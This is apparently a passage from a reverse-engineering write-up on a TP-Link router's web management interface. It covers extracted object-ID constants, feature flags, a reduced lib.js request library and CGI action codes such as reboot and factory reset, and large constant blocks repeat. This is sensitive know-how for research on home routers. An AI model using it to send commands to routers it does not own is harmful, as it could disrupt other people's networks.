var WAN_PPTP_CONN = "WAN_PPTP_CONN"
var WAN_PPTP_CONN_PORTMAPPING = "WAN_PPTP_CONN_PORTMAPPING"
var PPTP_CONN_PORTTRIGGERING = "PPTP_CONN_PORTTRIGGERING"
var WAN_PPTP_CONN_STATS = "WAN_PPTP_CONN_STATS"
var WAN_IP_CONN = "WAN_IP_CONN"
var WAN_IP_CONN_PORTMAPPING = "WAN_IP_CONN_PORTMAPPING"
var IP_CONN_PORTTRIGGERING = "IP_CONN_PORTTRIGGERING"
var WAN_PPP_CONN = "WAN_PPP_CONN"
var WAN_PPP_CONN_PORTMAPPING = "WAN_PPP_CONN_PORTMAPPING"
var PPP_CONN_PORTTRIGGERING = "PPP_CONN_PORTTRIGGERING"
var WAN_PPP_CONN_STATS = "WAN_PPP_CONN_STATS"
var STAT_CFG = "STAT_CFG"
var STAT_ENTRY = "STAT_ENTRY"
var DDOS_CFG = "DDOS_CFG"
var DOS_HOST = "DOS_HOST"
var ARP = "ARP"
var ARP_ENTRY = "ARP_ENTRY"
var ARP_BIND = "ARP_BIND"
var ARP_BIND_ENTRY = "ARP_BIND_ENTRY"
var QUEUE_MANAGEMENT = "QUEUE_MANAGEMENT"
var CLASSIFICATION = "CLASSIFICATION"
var QOS_APP = "QOS_APP"
var QOS_INTF = "QOS_INTF"
var QOS_QUEUE = "QOS_QUEUE"
var TC = "TC"
var TC_RULE = "TC_RULE"
var ALG_CFG = "ALG_CFG"
var IPTV = "IPTV"
var DSL_IPTV_CFG = "DSL_IPTV_CFG"
var ETH_IPTV_CFG = "ETH_IPTV_CFG"
var FIREWALL = "FIREWALL"
var INTERNAL_HOST = "INTERNAL_HOST"
var EXTERNAL_HOST = "EXTERNAL_HOST"
var TASK_SCHEDULE = "TASK_SCHEDULE"
var RULE = "RULE"
var URL_LIST = "URL_LIST"
var URL_CFG = "URL_CFG"
var IP6_FIREWALL = "IP6_FIREWALL"
var IP6_INTERNAL_HOST = "IP6_INTERNAL_HOST"
var IP6_EXTERNAL_HOST = "IP6_EXTERNAL_HOST"
var IP6_TASK_SCHEDULE = "IP6_TASK_SCHEDULE"
var IP6_RULE = "IP6_RULE"
var IP6_TUNNEL = "IP6_TUNNEL"
var DSLITE = "DSLITE"
var SIT_6RD = "SIT_6RD"
var SERVICES = "SERVICES"
var VOICE = "VOICE"
var XTP_VOICE_PROCESS_STS = "XTP_VOICE_PROCESS_STS"
var XTP_VOICE_PROCESS = "XTP_VOICE_PROCESS"
var VOICE_CAP = "VOICE_CAP"
var VOICE_CAP_SIP = "VOICE_CAP_SIP"
var VOICE_CAP_MGCP = "VOICE_CAP_MGCP"
var VOICE_CAP_CODECS = "VOICE_CAP_CODECS"
var VOICE_PROF = "VOICE_PROF"
var VOICE_PROF_PROVIDER = "VOICE_PROF_PROVIDER"
var VOICE_PROF_SIP = "VOICE_PROF_SIP"
var VOICE_PROF_SIP_EVTSUBSCRIBE = "VOICE_PROF_SIP_EVTSUBSCRIBE"
var VOICE_PROF_MGCP = "VOICE_PROF_MGCP"
var VOICE_PROF_RTP = "VOICE_PROF_RTP"
var VOICE_PROF_FAXT38 = "VOICE_PROF_FAXT38"
var XTP_USB_VOICEMAIL_PUBLICCFG = "XTP_USB_VOICEMAIL_PUBLICCFG"
var XTP_MULTI_ISP = "XTP_MULTI_ISP"
var XTP_MULTIISP_CODEC = "XTP_MULTIISP_CODEC"
var XTP_MULTIISP_CODEC_LIST = "XTP_MULTIISP_CODEC_LIST"
var VOICE_PROF_LINE = "VOICE_PROF_LINE"
var VOICE_PROF_LINE_SIP = "VOICE_PROF_LINE_SIP"
var VOICE_PROF_LINE_XTPUSBVM = "VOICE_PROF_LINE_XTPUSBVM"
var VOICE_PROF_LINE_CALLFEAT = "VOICE_PROF_LINE_CALLFEAT"
var VOICE_PROF_LINE_PROC = "VOICE_PROF_LINE_PROC"
var VOICE_PROF_LINE_CODEC = "VOICE_PROF_LINE_CODEC"
var VOICE_PROF_LINE_CODEC_LIST = "VOICE_PROF_LINE_CODEC_LIST"
var VOICE_PROF_LINE_STATS = "VOICE_PROF_LINE_STATS"
var XTP_FEATURE_CODE = "XTP_FEATURE_CODE"
var VOICE_PHY_INTERFACE = "VOICE_PHY_INTERFACE"
var VOICE_PHYINTERFACE_TESTS = "VOICE_PHYINTERFACE_TESTS"
var XTP_VOICE_MULTI_ISPDIALPLAN = "XTP_VOICE_MULTI_ISPDIALPLAN"
var XTP_VOICE_PSTN = "XTP_VOICE_PSTN"
var STORAGE_SERVICE = "STORAGE_SERVICE"
var CAPABLE = "CAPABLE"
var USER_ACCOUNT = "USER_ACCOUNT"
var USB_DEVICE = "USB_DEVICE"
var LOGICAL_VOLUME = "LOGICAL_VOLUME"
var FOLDER_BROWSE = "FOLDER_BROWSE"
var FOLDER_NODE = "FOLDER_NODE"
var DLNA_MEDIA_SERVER = "DLNA_MEDIA_SERVER"
var DLNA_MEDIA_SERVER_FOLDER = "DLNA_MEDIA_SERVER_FOLDER"
var SMB_SERVICE = "SMB_SERVICE"
var SMB_SERVICE_FOLDER = "SMB_SERVICE_FOLDER"
var SMB_USER_ACCESS = "SMB_USER_ACCESS"
var FTP_SERVER = "FTP_SERVER"
var FTP_SERVER_FOLDER = "FTP_SERVER_FOLDER"
var FTP_USER_ACCESS = "FTP_USER_ACCESS"
var XTP_PRINT_SERVICE = "XTP_PRINT_SERVICE"
var XTP_IGD_CALL_FIREWALL_CFG = "XTP_IGD_CALL_FIREWALL_CFG"
var XTP_IGD_SPEED_DIAL_CFG = "XTP_IGD_SPEED_DIAL_CFG"
var XTP_IGD_MULTI_ISP_DIAL_PLAN = "XTP_IGD_MULTI_ISP_DIAL_PLAN"
var XTP_IGD_MULTIISPDP_LIST = "XTP_IGD_MULTIISPDP_LIST"
var XTP_CALLLOGCFG = "XTP_CALLLOGCFG"
var IPSEC = "IPSEC"
var IPSEC_CFG = "IPSEC_CFG"
var SYS_MODE = "SYS_MODE"
var EWAN = "EWAN"
var USER_INFO = "USER_INFO"
var GPON_USER_INFO = "GPON_USER_INFO"
var GPON_AUTH_CTC = "GPON_AUTH_CTC"
var GPON_AUTH_SN = "GPON_AUTH_SN"
var GPON_AUTH_PWD = "GPON_AUTH_PWD"
var GPON_MAC_INFO = "GPON_MAC_INFO"
var GPON_FWD_RULE = "GPON_FWD_RULE"
var GPON_LOCAL_RULE_ENTRY = "GPON_LOCAL_RULE_ENTRY"
var GPON_REMOTE_RULE_ENTRY = "GPON_REMOTE_RULE_ENTRY"
var GPON_OMCI_IOT = "GPON_OMCI_IOT"
var GPON_OMCI_IOT_ENTRY = "GPON_OMCI_IOT_ENTRY"
var GPON_OMCI_ME_ATTR = "GPON_OMCI_ME_ATTR"
var CLOUD_SERVICE = "CLOUD_SERVICE"
var FW_UPGRADE_INFO = "FW_UPGRADE_INFO"
var CLOUD_USER_ACCOUNT = "CLOUD_USER_ACCOUNT"
var OWNER_INFO = "OWNER_INFO"
var CURRENT_USER_INFO = "CURRENT_USER_INFO"
var CLOUD_DDNS = "CLOUD_DDNS"
var CLOUD_DDNS_ENTRY = "CLOUD_DDNS_ENTRY"
var WAN_BLOCK = "WAN_BLOCK"
var WAN_ERROR_BLOCK = "WAN_ERROR_BLOCK"
var FW_UP_INFO_BLOCK = "FW_UP_INFO_BLOCK"
var IPPING_DIAG = "IPPING_DIAG"
var TRACEROUTE_DIAG = "TRACEROUTE_DIAG"
var SDMZ_CFG = "SDMZ_CFG"
var WEB_CFG = "WEB_CFG"
var VLAN = "VLAN"
var ISP_SERVICE = "ISP_SERVICE"
var WOL = "WOL"
var WOL_ITEM = "WOL_ITEM"
var IPV6_CFG = "IPV6_CFG"
var SYS_STATE = "SYS_STATE"
var IPV6_PASS_THROUGH = "IPV6_PASS_THROUGH"
var AUTO_REBOOT_CFG = "AUTO_REBOOT_CFG"
var CPU_MEM = "CPU_MEM"
var PRODUCE_INFO = "PRODUCE_INFO"
var MULTIMODE = "MULTIMODE"
var MULTIMODE_AP = "MULTIMODE_AP"
var AP_CONFIG_WEPKEY = "AP_CONFIG_WEPKEY"
var AP_SNMP_CFG = "AP_SNMP_CFG"
var MULTIMODE_CLIENT = "MULTIMODE_CLIENT"
var MULTIMODE_RE = "MULTIMODE_RE"
var RE_CONFIG_WEPKEY = "RE_CONFIG_WEPKEY"
var MULTIMODE_ROUTER = "MULTIMODE_ROUTER"
var ROUTER_CONFIG_WEPKEY = "ROUTER_CONFIG_WEPKEY"
var ROUTER_CONFIG_MULTISSID = "ROUTER_CONFIG_MULTISSID"
var ROUTER_CONFIG_MSSIDENTRY = "ROUTER_CONFIG_MSSIDENTRY"
var MULTIMODE_MSSID = "MULTIMODE_MSSID"
var MSSID_CONFIG_MULTISSID = "MSSID_CONFIG_MULTISSID"
var MSSID_CONFIG_MSSIDENTRY = "MSSID_CONFIG_MSSIDENTRY"
var MULTIMODE_HOTSPOT = "MULTIMODE_HOTSPOT"
var PING_WATCH_DOG = "PING_WATCH_DOG"
var LED_CONTROL = "LED_CONTROL"
// Dynamic Parameters
var INCLUDE_MULTI_LANGUAGE_Q=0
var INCLUDE_MULTIMODE_RE=1
var WEB_INCLUDE_TEST=0
var WEB_INCLUDE_MULTI_EWAN=0
var WEB_INCLUDE_DST=1
var WEB_QS_CHANGEPASSWORD=0
var INCLUDE_IP6_WAN_NOT_ASSIGN_ADDR=0
var INCLUDE_UN_IPTV=0
var INCLUDE_SCHEDULE_NEW=0
var INCLUDE_HW_NAT=0
var INCLUDE_LED_CONTROL=0
var INCLUDE_MULTILANGUAGE=0
var INCLUDE_FEEDBACK=0
var INCLUDE_FORCE_TIMEZONE_SELECT=0
var INCLUDE_FORCE_REGION_SELECT=0
var INCLUDE_WLAN_REGION_LIST=0
var INCLUDE_MULTIPLE_LOCALIZATION=0
var INCLUDE_SCAN_ALL_CHANNELS=0
var INCLUDE_LAN_WLAN=1
var INCLUDE_VOIP
var INCLUDE_FXS_NUM
var INCLUDE_CALLLOG
var INCLUDE_USB_VOICEMAIL
var INCLUDE_PSTN
var INCLUDE_PSTN_GATEWAY
var INCLUDE_PSTN_LIFELINE
var INCLUDE_BRIDGING=1
var INCLUDE_IGMP=1
var INCLUDE_ETHERNET_WAN=1
var INCLUDE_SNMP
var INCLUDE_RIP=1
var INCLUDE_DDNS_PH
var INCLUDE_LAN_WLAN_MSSID=1
var INCLUDE_LAN_WLAN_WDS=1
var INCLUDE_IPTV
var INCLUDE_CWMP
var INCLUDE_DYNDNS=1
var INCLUDE_USB=1
var INCLUDE_USB_STORAGE=1
var INCLUDE_USB_MEDIA_SERVER=1
var INCLUDE_USB_SAMBA_SERVER=1
var INCLUDE_USB_FTP_SERVER=1
var INCLUDE_USB_OVER_IP
var INCLUDE_ADSLWAN
var INCLUDE_AUTO_PVC
var INCLUDE_IPV6=1
var INCLUDE_IPV6_SLAAC=1
var INCLUDE_SPECIAL_DIAL_MODE
var INCLUDE_WAN_MODE=1
var INCLUDE_IPSEC
var INCLUDE_NOIPDNS=1
var INCLUDE_ALG_H323=1
var INCLUDE_ALG_SIP=1
var INCLUDE_PON_ETH_WAN
var INCLUDE_EPON_INFO
var INCLUDE_GPON_INFO
var INCLUDE_QOS
var INCLUDE_E8_APP
var INCLUDE_TFC_PERU
var INCLUDE_USB_3G_DONGLE=1
var INCLUDE_LAN_WLAN_SCHEDULE=1
var INCLUDE_ROUTE_BINDING
var INCLUDE_LAN_WLAN_GUESTNETWORK=1
var INCLUDE_LAN_WLAN_DUALBAND=1
var INCLUDE_LAN_WLAN_HWSWITCH
var INCLUDE_LAN_WLAN_AC=1
var INCLUDE_LAN_WLAN_WDS_DETECT
var INCLUDE_L2TP=1
var INCLUDE_PPTP=1
var INCLUDE_IPV6_MLD=1
var INCLUDE_ACL
var INCLUDE_ACL_ADVANCE
var INCLUDE_DUAL_ACCESS=1
var INCLUDE_WAN_TYPE_DETECT=1
var INCLUDE_BPA=1
var INCLUDE_CMXDNS=1
var INCLUDE_IPPING_DIAG=1
var INCLUDE_TRACEROUTE_DIAG=1
var INCLUDE_LAN_WLAN_QUICKSAVE=1
var INCLUDE_IGMP_FORCEVERSION=1
var INCLUDE_PORTABLE_APP=1
var DEFAULT_NO_SPEC=1
var INCLUDE_MEXICO_SPEC
var INCLUDE_CANADA_SPEC
var INCLUDE_JAPAN_SPEC
var INCLUDE_KOREA_SPEC
var INCLUDE_PL_SPEC
var INCLUDE_BR_SPEC
var INCLUDE_ROMANIA_SPEC
var INCLUDE_RUSSIA_SPEC
var INCLUDE_US_SPEC
var INCLUDE_VN_SPEC
var INCLUDE_VIETNAM_FPT
var INCLUDE_TW_SPEC
var INCLUDE_ES_SPEC
var INCLUDE_X_TP_VLAN=1
var INCLUDE_FORBID_WAN_PING=1
var INCLUDE_SMART_DHCP=1
var INCLUDE_MIC=1
var INCLUDE_IPV6_PASS_THROUGH
var INCLUDE_AUTOREBOOT
var INCLUDE_CPUMEM_INFO
var INCLUDE_MULTIMODE_RE=1
var INCLUDE_MULTIMODE_AP=1
var INCLUDE_MULTIMODE_CLIENT=1
var INCLUDE_MULTIMODE=1
var INCLUDE_PING_WATCHDOG=1
var INCLUDE_MULTIMODE_ROUTER=1
var INCLUDE_MULTIMODE_MSSID
var INCLUDE_YANDEX_DNS
var INCLUDE_LED_CONTROL
var INCLUDE_MULTILANGUAGE
var INCLUDE_FORCE_TIMEZONE_SELECT
var INCLUDE_FORCE_REGION_SELECT
var INCLUDE_MULTIMODE_HOTSPOT=1
var INCLUDE_WLAN_REGION_LIST
var INCLUDE_FBWIFI
The previously introduced concept varies a little bit on the newer firmware, which uses
/cgi_gdpr in addition to /cgi. In this scenario the payload gets AES encrypted before transmitting. The generic /cgi calls are still used, but most calls need to be encrypted. This is done by setting the new $.exe(hook, unerr, securityLevel) parameter securityLevel to 1, to enable encryption.ⓘ TL-WR802N FW190428
ⓘ Strongly Reduced version of the lib.js, showing the $.cgi, $.act and $.exe methods.
# lib_modified.js
(function(){
var window = this,
window.$ = {
cgi: function(path, arg, hook, noquit, unerr) {
var expr = /(^|\/)(\w+)\.htm$/;
if ($.local || $.sim) path = $.params;
else path = (path ? path : $.curPage.replace(/\.htm$/, ".cgi")) + (arg ? "?" + $.toStr(arg, "=", "&") : "");
$.ret = 0;
var func = hook ? function(ret) {if (!ret && (ret = $.ret)) $.err("cgi", $.ret, unerr); if (typeof hook === "function") hook(ret);} : null;
var ret = $.io(path, true, func, null, noquit, unerr);
if (!ret && (ret = $.ret))
$.err("cgi", $.ret, unerr);
return ret;
},
act: function(type, oid, stack, pStack, attrs) {
if (!type || !oid)
return false;
stack = stack ? stack : "0,0,0,0,0,0";
pStack = pStack ? pStack : "0,0,0,0,0,0";
attrs = $.toStr(attrs, "=", "\r\n", true);
attrs = attrs.replace(/__stack=[0-9,]*\r\n/, "");
var ret = null;
switch (type) {
case ACT_ADD:
if ($.cn) attrs = $.ansi(attrs);
case ACT_GET:
ret = {};
break;
case ACT_GL:
case ACT_GS:
ret = [];
break;
case ACT_SET:
case ACT_CGI:
oid = oid ? oid : $.curPage.replace(/\.htm$/, ".cgi");
if ($.cn) attrs = $.ansi(attrs);
case ACT_DEL:
case ACT_OP:
break;
default:
return false;
}
$.as.push([type, null, oid, stack, pStack, attrs, attrs ? attrs.match(/\r\n/g).length : 0]);
$.ds.push(ret);
return ret;
},
exe: function(hook, unerr, securityLevel) {
var url = "/cgi?";
var data = "";
var index = 0;
var obj;
var bAnsi = false;
var tmpdata = "";
if( INCLUDE_LOGIN_GDPR_ENCRYPT && securityLevel != 0)
{
try{
url="/cgi_gdpr?";
}
catch(e)
{
}
}
if ($.as.length == 0 || $.local || $.sim) {
if (hook && typeof hook === "function") $.timeout(hook, 200);
while($.as.pop() !== undefined);
while($.ds.pop() !== undefined);
return 0;
}
$.empty($.id("ansiform"));
while ($.ansiarg.length) {
obj = $.ansiarg.shift();
$.append($.id("ansiform"), "<input type='hidden' name='"+obj[0]+"' value='"+obj[1].replace(/\&/g, "&").replace(/</g, "<").replace(/'/g, "'")+"' />");
bAnsi = true;
}
if(INCLUDE_LOGIN_GDPR_ENCRYPT && url.match("/cgi_gdpr") != null)
{
while(obj = $.as.shift()){
//url = "/cgi";
tmpdata += obj[0] + (obj[1] ? "=" + obj[1] : "") + "&";
//url += obj[0] + (obj[1] ? "=" + obj[1] : "") + "&";
data += "[" + obj[2] + "#" + obj[3] + "#" + obj[4] + "]" + index + ", " + obj[6] + "\r\n" + obj[5];
index++;
}
tmpdata = tmpdata.substr(0, tmpdata.length - 1);
tmpdata = tmpdata + "\r\n"+data;
data = tmpdata;
}
else
{
while(obj = $.as.shift()){
url += obj[0] + (obj[1] ? "=" + obj[1] : "") + "&";
data += "[" + obj[2] + "#" + obj[3] + "#" + obj[4] + "]" + index + ", " + obj[6] + "\r\n" + obj[5];
index++;
}
}
url = url.substr(0, url.length - 1);
if (hook) {
var tmpds = $.mkArr($.ds);
while($.ds.length) $.ds.pop();
}
var resolve = function(ret, ds) {
if (typeof ret !== "number") {
var lines = ret.split('\n');
ret = 0;
$.ret = 0;
var scripts = "";
for (var i = 0, l = lines.length; i < l; i++) {
if (lines[i] == "") continue;
if (lines[i].charAt(0) == "[") {
if (scripts != "") {
$.script(scripts);
if ($.ret) {
ret = $.ret;
$.err("cgi", ret, unerr);
break;
}
scripts = "";
}
var n = lines[i].indexOf("]");
var j = parseInt(lines[i].substr(n+1), 10);
var stack = lines[i].substr(1, n-1);
var instance;
if (stack == "error") {
if (j) {
ret = j;
if (ret != ERR_HTTP_ERR_CGI_INVALID_ANSI) $.err("exe", ret, unerr);
break;
}
}
else if (ds[j] instanceof Array) {
instance = {__stack: stack};
ds[j].push(instance);
}
else if (ds[j] != null) {
instance = ds[j];
instance.__stack = stack;
}
}
else {
if (stack == "cgi") {
scripts += lines[i] + '\n';
}
else {
var attr = lines[i].split("=");
instance[attr[0]] = attr.slice(1).join('=');
}
}
}
}
while(ds.length) ds.pop();
return ret;
}
if (bAnsi) {
var formObj = $.d.forms[0];
try {
formObj.target = "up_frame";
formObj.action = "/cgi/ansi";
formObj.submit();
}catch(e){}
}
if (hook) {
var resolve2 = function(){
$.io(url, false, function(ret){ ret = resolve(ret, tmpds); if (typeof hook === "function") hook(ret);}, data, false, unerr)};
if (bAnsi) $.timeout(resolve2, 100);
else resolve2();
return 0;
}
else {
while(ret = $.io(url, false, null, data, false, unerr)) {
ret = resolve(ret, $.ds);
if (ret != ERR_HTTP_ERR_CGI_INVALID_ANSI) return ret;
count++;
if (count > 3) return $.err("exe", ERR_HTTP_ERR_CGI_INVALID_ANSI, unerr);
}
}
}
};
})();
ⓘ CGI parameters extracted from lib.js and oid_str.js
var ACT_GET = 1;
var ACT_SET = 2;
var ACT_ADD = 3;
var ACT_DEL = 4;
var ACT_GL = 5;
var ACT_GS = 6;
var ACT_OP = 7;
var ACT_CGI = 8;
var ACT_SIG = 9;
var ACT_OP_REBOOT = "ACT_REBOOT";
var ACT_OP_FACTORY_RESET = "ACT_FACTORY_RESET";
var ACT_OP_DHCP_RENEW = "ACT_DHCP_RENEW";
var ACT_OP_DHCP_RELEASE = "ACT_DHCP_RELEASE";
var ACT_OP_PPP_CONN = "ACT_PPP_CONN";
var ACT_OP_PPP_DISCONN = "ACT_PPP_DISCONN";
var ACT_OP_WLAN_GET_NEW_PIN = "ACT_WLAN_GET_NEW_PIN";
var ACT_OP_WLAN_RESTORE_PIN = "ACT_WLAN_RESTORE_PIN";
var ACT_OP_WLAN_UPDATE_ASSOC = "ACT_WLAN_UPDATE_ASSOC";
var ACT_OP_WLAN_WPS_PBC = "ACT_WLAN_WPS_PBC";
var ACT_OP_WLAN_WPS_PIN = "ACT_WLAN_WPS_PIN";
var ACT_OP_WLAN_SCAN = "ACT_WLAN_SCAN";
var ACT_OP_NTP_REQUEST = "ACT_NTP_REQUEST";
var ACT_OP_DLNA_MANUAL_SCAN = "ACT_DLNA_MANUAL_SCAN";
var ACT_OP_L2TP_CONN = "ACT_L2TP_CONN";
var ACT_OP_L2TP_DISCONN = "ACT_L2TP_DISCONN";
var ACT_OP_PPTP_CONN = "ACT_PPTP_CONN";
var ACT_OP_PPTP_DISCONN = "ACT_PPTP_DISCONN";
var ACT_OP_WAN_TYPE_DETECT = "ACT_WAN_TYPE_DETECT";
var ACT_OP_BPA_CONN = "ACT_BPA_CONN";
var ACT_OP_BPA_DISCONN = "ACT_BPA_DISCONN";
var ACT_OP_IPPING = "ACT_OP_IPPING";
var ACT_OP_TRACERT = "ACT_OP_TRACERT";
var ERR_HTTP_ERR_CGI_INVALID_ANSI = 71017;
var IGD = "IGD"
var IGD_DEV_INFO = "IGD_DEV_INFO"
var SYSLOG_CFG = "SYSLOG_CFG"
var MANAGEMENT_SERVER = "MANAGEMENT_SERVER"
var ETH_SWITCH = "ETH_SWITCH"
var SYS_CFG = "SYS_CFG"
var NET_CFG = "NET_CFG"
var USER_CFG = "USER_CFG"
var CURRENT_USER = "CURRENT_USER"
var APP_CFG = "APP_CFG"
var HTTP_CFG = "HTTP_CFG"
var HTTPS_CERT_AUTH = "HTTPS_CERT_AUTH"
var PH_DDNS_CFG = "PH_DDNS_CFG"
var PH_RT_DATA = "PH_RT_DATA"
var DYN_DNS_CFG = "DYN_DNS_CFG"
var UPNP_CFG = "UPNP_CFG"
var UPNP_PORTMAPPING = "UPNP_PORTMAPPING"
var DIAG_TOOL = "DIAG_TOOL"
var CWMP_CFG = "CWMP_CFG"
var SNMP_CFG = "SNMP_CFG"
var NOIP_DNS_CFG = "NOIP_DNS_CFG"
var CMX_DNS_CFG = "CMX_DNS_CFG"
var ACL_CFG = "ACL_CFG"
var WAN_TYPE_DETECT = "WAN_TYPE_DETECT"
var DMZ_HOST_CFG = "DMZ_HOST_CFG"
var TIME = "TIME"
var HOUR = "HOUR"
var L3_FORWARDING = "L3_FORWARDING"
var L3_FORWARDING_ENTRY = "L3_FORWARDING_ENTRY"
var L3_IP6_FORWARDING = "L3_IP6_FORWARDING"
var L3_IP6_FORWARDING_ENTRY = "L3_IP6_FORWARDING_ENTRY"
var L2_BRIDGING = "L2_BRIDGING"
var L2_BRIDGING_ENTRY = "L2_BRIDGING_ENTRY"
var L2_BRIDGING_FILTER = "L2_BRIDGING_FILTER"
var L2_BRIDGING_INTF = "L2_BRIDGING_INTF"
var LAN_DEV = "LAN_DEV"
var LAN_HOST_CFG = "LAN_HOST_CFG"
var LAN_IP_INTF = "LAN_IP_INTF"
var LAN_DHCP_STATIC_ADDR = "LAN_DHCP_STATIC_ADDR"
var LAN_DHCP_COND_SRV_POOL = "LAN_DHCP_COND_SRV_POOL"
var LAN_DHCP_COND_SRV_POOL_OPT = "LAN_DHCP_COND_SRV_POOL_OPT"
var YANDEX_DNS_POOL = "YANDEX_DNS_POOL"
var LAN_IP6_HOST_CFG = "LAN_IP6_HOST_CFG"
var LAN_IP6_INTF = "LAN_IP6_INTF"
var LAN_ETH_INTF = "LAN_ETH_INTF"
var LAN_HOSTS = "LAN_HOSTS"
var LAN_HOST_ENTRY = "LAN_HOST_ENTRY"
var LAN_WLAN = "LAN_WLAN"
var LAN_WLAN_WPS = "LAN_WLAN_WPS"
var LAN_WLAN_MACTABLEENTRY = "LAN_WLAN_MACTABLEENTRY"
var LAN_WLAN_ASSOC_DEV = "LAN_WLAN_ASSOC_DEV"
var LAN_WLAN_BSSDESC_ENTRY = "LAN_WLAN_BSSDESC_ENTRY"
var LAN_WLAN_WEPKEY = "LAN_WLAN_WEPKEY"
var LAN_WLAN_WDSBRIDGE = "LAN_WLAN_WDSBRIDGE"
var LAN_WLAN_MULTISSID = "LAN_WLAN_MULTISSID"
var LAN_WLAN_MSSIDENTRY = "LAN_WLAN_MSSIDENTRY"
var LAN_WLAN_MSSIDWEPKEY = "LAN_WLAN_MSSIDWEPKEY"
var MSSID_MACTABLEENTRY = "MSSID_MACTABLEENTRY"
var LAN_WLAN_WLBRNAME = "LAN_WLAN_WLBRNAME"
var LAN_WLAN_TASK_SCHEDULE = "LAN_WLAN_TASK_SCHEDULE"
var LAN_WLAN_QUICKSAVE = "LAN_WLAN_QUICKSAVE"
var LAN_WLAN_GUESTNET = "LAN_WLAN_GUESTNET"
var LAN_IGMP_SNOOP = "LAN_IGMP_SNOOP"
var WAN_DEV = "WAN_DEV"
var WAN_COMMON_INTF_CFG = "WAN_COMMON_INTF_CFG"
var WAN_DSL_INTF_CFG = "WAN_DSL_INTF_CFG"
var WAN_DSL_INTF_STATS = "WAN_DSL_INTF_STATS"
var WAN_DSL_INTF_STATS_TOTAL = "WAN_DSL_INTF_STATS_TOTAL"
var WAN_DSL_AUTOPVC = "WAN_DSL_AUTOPVC"
var WAN_DSL_AUTO_PVC_PAIR = "WAN_DSL_AUTO_PVC_PAIR"
var WAN_ETH_INTF = "WAN_ETH_INTF"
var WAN_ETH_INTF_STATS = "WAN_ETH_INTF_STATS"
var WAN_PON = "WAN_PON"
var WAN_EPON_INTF = "WAN_EPON_INTF"
var WAN_EPON_INTF_OAM_STATS = "WAN_EPON_INTF_OAM_STATS"
var WAN_EPON_INTF_MPCP_STATS = "WAN_EPON_INTF_MPCP_STATS"
var WAN_EPON_INTF_STATS = "WAN_EPON_INTF_STATS"
var WAN_EPON_INTF_OPTICAL_STATS = "WAN_EPON_INTF_OPTICAL_STATS"
var WAN_GPON_INTF = "WAN_GPON_INTF"
var WAN_GPON_INTF_OMCI_STATS = "WAN_GPON_INTF_OMCI_STATS"
var WAN_GPON_INTF_STATS = "WAN_GPON_INTF_STATS"
var WAN_GPON_INTF_OPTICAL_STATS = "WAN_GPON_INTF_OPTICAL_STATS"
var WAN_CONN_DEVICE = "WAN_CONN_DEVICE"
var WAN_DSL_LINK_CFG = "WAN_DSL_LINK_CFG"
var WAN_PON_LINK_CFG = "WAN_PON_LINK_CFG"
var WAN_ETH_LINK_CFG = "WAN_ETH_LINK_CFG"
var WAN_USB_3G_LINK_CFG = "WAN_USB_3G_LINK_CFG"
var USB_MODEM_PARAM = "USB_MODEM_PARAM"
var WAN_L2TP_CONN = "WAN_L2TP_CONN"
var WAN_L2TP_CONN_PORTMAPPING = "WAN_L2TP_CONN_PORTMAPPING"
var L2TP_CONN_PORTTRIGGERING = "L2TP_CONN_PORTTRIGGERING"
var WAN_L2TP_CONN_STATS = "WAN_L2TP_CONN_STATS"
var WAN_PPTP_CONN = "WAN_PPTP_CONN"
var WAN_PPTP_CONN_PORTMAPPING = "WAN_PPTP_CONN_PORTMAPPING"
var PPTP_CONN_PORTTRIGGERING = "PPTP_CONN_PORTTRIGGERING"
var WAN_PPTP_CONN_STATS = "WAN_PPTP_CONN_STATS"
var WAN_IP_CONN = "WAN_IP_CONN"
var WAN_IP_CONN_PORTMAPPING = "WAN_IP_CONN_PORTMAPPING"
var IP_CONN_PORTTRIGGERING = "IP_CONN_PORTTRIGGERING"
var WAN_PPP_CONN = "WAN_PPP_CONN"
var WAN_PPP_CONN_PORTMAPPING = "WAN_PPP_CONN_PORTMAPPING"
var PPP_CONN_PORTTRIGGERING = "PPP_CONN_PORTTRIGGERING"
var WAN_PPP_CONN_STATS = "WAN_PPP_CONN_STATS"
var STAT_CFG = "STAT_CFG"
var STAT_ENTRY = "STAT_ENTRY"
var DDOS_CFG = "DDOS_CFG"
var DOS_HOST = "DOS_HOST"
var ARP = "ARP"
var ARP_ENTRY = "ARP_ENTRY"
var ARP_BIND = "ARP_BIND"
var ARP_BIND_ENTRY = "ARP_BIND_ENTRY"
var QUEUE_MANAGEMENT = "QUEUE_MANAGEMENT"
var CLASSIFICATION = "CLASSIFICATION"
var QOS_APP = "QOS_APP"
var QOS_INTF = "QOS_INTF"
var QOS_QUEUE = "QOS_QUEUE"
var TC = "TC"
var TC_RULE = "TC_RULE"
var ALG_CFG = "ALG_CFG"
var IPTV = "IPTV"
var DSL_IPTV_CFG = "DSL_IPTV_CFG"
var ETH_IPTV_CFG = "ETH_IPTV_CFG"
var FIREWALL = "FIREWALL"
var INTERNAL_HOST = "INTERNAL_HOST"
var EXTERNAL_HOST = "EXTERNAL_HOST"
var TASK_SCHEDULE = "TASK_SCHEDULE"
var RULE = "RULE"
var URL_LIST = "URL_LIST"
var URL_CFG = "URL_CFG"
var IP6_FIREWALL = "IP6_FIREWALL"
var IP6_INTERNAL_HOST = "IP6_INTERNAL_HOST"
var IP6_EXTERNAL_HOST = "IP6_EXTERNAL_HOST"
var IP6_TASK_SCHEDULE = "IP6_TASK_SCHEDULE"
var IP6_RULE = "IP6_RULE"
var IP6_TUNNEL = "IP6_TUNNEL"
var DSLITE = "DSLITE"
var SIT_6RD = "SIT_6RD"
var SERVICES = "SERVICES"
var VOICE = "VOICE"
var XTP_VOICE_PROCESS_STS = "XTP_VOICE_PROCESS_STS"
var XTP_VOICE_PROCESS = "XTP_VOICE_PROCESS"
var VOICE_CAP = "VOICE_CAP"
var VOICE_CAP_SIP = "VOICE_CAP_SIP"
var VOICE_CAP_MGCP = "VOICE_CAP_MGCP"
var VOICE_CAP_CODECS = "VOICE_CAP_CODECS"
var VOICE_PROF = "VOICE_PROF"
var VOICE_PROF_PROVIDER = "VOICE_PROF_PROVIDER"
var VOICE_PROF_SIP = "VOICE_PROF_SIP"
var VOICE_PROF_SIP_EVTSUBSCRIBE = "VOICE_PROF_SIP_EVTSUBSCRIBE"
var VOICE_PROF_MGCP = "VOICE_PROF_MGCP"
var VOICE_PROF_RTP = "VOICE_PROF_RTP"
var VOICE_PROF_FAXT38 = "VOICE_PROF_FAXT38"
var XTP_USB_VOICEMAIL_PUBLICCFG = "XTP_USB_VOICEMAIL_PUBLICCFG"
var XTP_MULTI_ISP = "XTP_MULTI_ISP"
